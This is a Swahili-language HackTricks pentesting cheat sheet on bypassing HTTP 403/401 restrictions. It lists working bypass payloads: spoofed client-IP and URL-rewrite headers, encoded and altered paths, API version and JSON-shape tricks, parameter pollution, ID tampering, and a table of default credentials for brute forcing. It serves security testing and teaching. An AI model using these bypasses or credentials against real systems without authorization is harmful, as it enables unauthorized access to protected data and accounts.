403 & 401 Bypasses

Support HackTricks

Mipangilio inayopatikana mara moja kwa ajili ya tathmini ya udhaifu & upimaji wa pen. Fanya pentest kamili kutoka mahali popote na zana 20+ & vipengele vinavyotoka kwenye recon hadi ripoti. Hatubadilishi wapimaji wa udhaifu - tunatengeneza zana maalum, moduli za kugundua & kutumia ili kuwapa muda wa kuchimba zaidi, kufungua shells, na kufurahia.

HTTP Verbs/Methods Fuzzing

Jaribu kutumia vitenzi tofauti kufikia faili: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK

  • Angalia vichwa vya majibu, labda taarifa fulani zinaweza kutolewa. Kwa mfano, jibu la 200 kwa HEAD lenye Content-Length: 55 lina maana kwamba kitenzi cha HEAD kinaweza kufikia taarifa. Lakini bado unahitaji kupata njia ya kuhamasisha taarifa hiyo.

  • Kutumia kichwa cha HTTP kama X-HTTP-Method-Override: PUT kunaweza kubadilisha kitenzi kilichotumika.

  • Tumia TRACE kitenzi na ikiwa uko na bahati kubwa labda katika jibu unaweza pia kuona vichwa vilivyoongezwa na proxies za kati ambavyo vinaweza kuwa na manufaa.

HTTP Headers Fuzzing

  • Badilisha kichwa cha Host kuwa thamani yoyote (ambayo ilifanya kazi hapa)

  • Jaribu kutumia User Agents wengine kufikia rasilimali.

  • Fuzz HTTP Headers: Jaribu kutumia HTTP Proxy Headers, HTTP Authentication Basic na NTLM brute-force (kwa mchanganyiko machache tu) na mbinu nyingine. Ili kufanya yote haya nimeunda zana fuzzhttpbypass.

  • X-Originating-IP: 127.0.0.1

  • X-Forwarded-For: 127.0.0.1

  • X-Forwarded: 127.0.0.1

  • Forwarded-For: 127.0.0.1

  • X-Remote-IP: 127.0.0.1

  • X-Remote-Addr: 127.0.0.1

  • X-ProxyUser-Ip: 127.0.0.1

  • X-Original-URL: 127.0.0.1

  • Client-IP: 127.0.0.1

  • True-Client-IP: 127.0.0.1

  • Cluster-Client-IP: 127.0.0.1

  • X-ProxyUser-Ip: 127.0.0.1

  • Host: localhost

Ikiwa njia imekingwa unaweza kujaribu kupita kinga ya njia kwa kutumia vichwa hivi vingine:

  • X-Original-URL: /admin/console

  • X-Rewrite-URL: /admin/console

  • Ikiwa ukurasa uko nyuma ya proxy, labda ni proxy inayokuzuia kufikia taarifa za kibinafsi. Jaribu kutumia HTTP Request Smuggling au vichwa vya hop-by-hop.

  • Fuzz vichwa maalum vya HTTP ukitafuta majibu tofauti.

  • Fuzz vichwa maalum vya HTTP wakati wa fuzzing HTTP Methods.

  • Ondoa kichwa cha Host na labda utaweza kupita kinga hiyo.

Path Fuzzing

Ikiwa /path imezuiwa:

  • Jaribu kutumia /%2e/path _(ikiwa ufikiaji umezuiwa na proxy, hii inaweza kupita kinga). Jaribu pia_** /%252e**/path (kuandika tena URL mara mbili)

  • Jaribu Unicode bypass: /%ef%bc%8fpath (Herufi zilizowekwa URL ni kama "/") hivyo wakati zinapowekwa tena itakuwa //path na labda tayari umepita ukaguzi wa jina /path

  • Njia nyingine za kupita:

  • site.com/secret –> HTTP 403 Forbidden

  • site.com/SECRET –> HTTP 200 OK

  • site.com/secret/ –> HTTP 200 OK

  • site.com/secret/. –> HTTP 200 OK

  • site.com//secret// –> HTTP 200 OK

  • site.com/./secret/.. –> HTTP 200 OK

  • site.com/;/secret –> HTTP 200 OK

  • site.com/.;/secret –> HTTP 200 OK

  • site.com//;//secret –> HTTP 200 OK

  • site.com/secret.json –> HTTP 200 OK (ruby)

  • Tumia orodha hii katika hali zifuatazo:

  • /FUZZsecret

  • /FUZZ/secret

  • /secretFUZZ

  • Njia nyingine za API:

  • /v3/users_data/1234 --> 403 Forbidden

  • /v1/users_data/1234 --> 200 OK

  • {“id”:111} --> 401 Unauthriozied

  • {“id”:[111]} --> 200 OK

  • {“id”:111} --> 401 Unauthriozied

  • {“id”:{“id”:111}} --> 200 OK

  • {"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parameter Pollution)

  • user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution)

Parameter Manipulation

  • Badilisha thamani ya param: Kutoka id=123 --> id=124

  • Ongeza vigezo vya ziada kwenye URL: ?id=124 —-> id=124&isAdmin=true

  • Ondoa vigezo

  • Panga upya vigezo

  • Tumia herufi maalum.

  • Fanya majaribio ya mipaka katika vigezo — toa thamani kama -234 au 0 au 99999999 (thamani chache za mfano).

Protocol version

Ikiwa unatumia HTTP/1.1 jaribu kutumia 1.0 au hata jaribu ikiwa inasaidia 2.0.

Njia nyingine za kupita

  • Pata IP au CNAME ya domain na jaribu kuwasiliana nayo moja kwa moja.

  • Jaribu kushinikiza server kwa kutuma maombi ya kawaida ya GET (Ilifanya kazi kwa mtu huyu na Facebook).

  • Badilisha protokali: kutoka http hadi https, au kutoka https hadi http

  • Nenda kwenye https://archive.org/web/ na angalia ikiwa katika siku za nyuma faili hiyo ilikuwa inapatikana duniani kote.

Brute Force

  • Kisia nenosiri: Jaribu akrediti za kawaida zifuatazo. Je, unajua kitu kuhusu mwathirika? Au jina la changamoto ya CTF?

  • Brute force: Jaribu msingi, digest na NTLM auth.

Common creds
admin    admin
admin    password
admin    1234
admin    admin1234
admin    123456
root     toor
test     test
guest    guest

Zana za Otomatiki

Mipangilio inayopatikana mara moja kwa ajili ya tathmini ya udhaifu & upimaji wa penya. Fanya upimaji kamili kutoka mahali popote na zana 20+ & vipengele vinavyotoka kwenye utafiti hadi ripoti. Hatubadilishi wapimaji wa penya - tunatengeneza zana maalum, moduli za kugundua & kutumia ili kuwapa muda wa kuchimba zaidi, kufungua shells, na kufurahia.

Support HackTricks

Last updated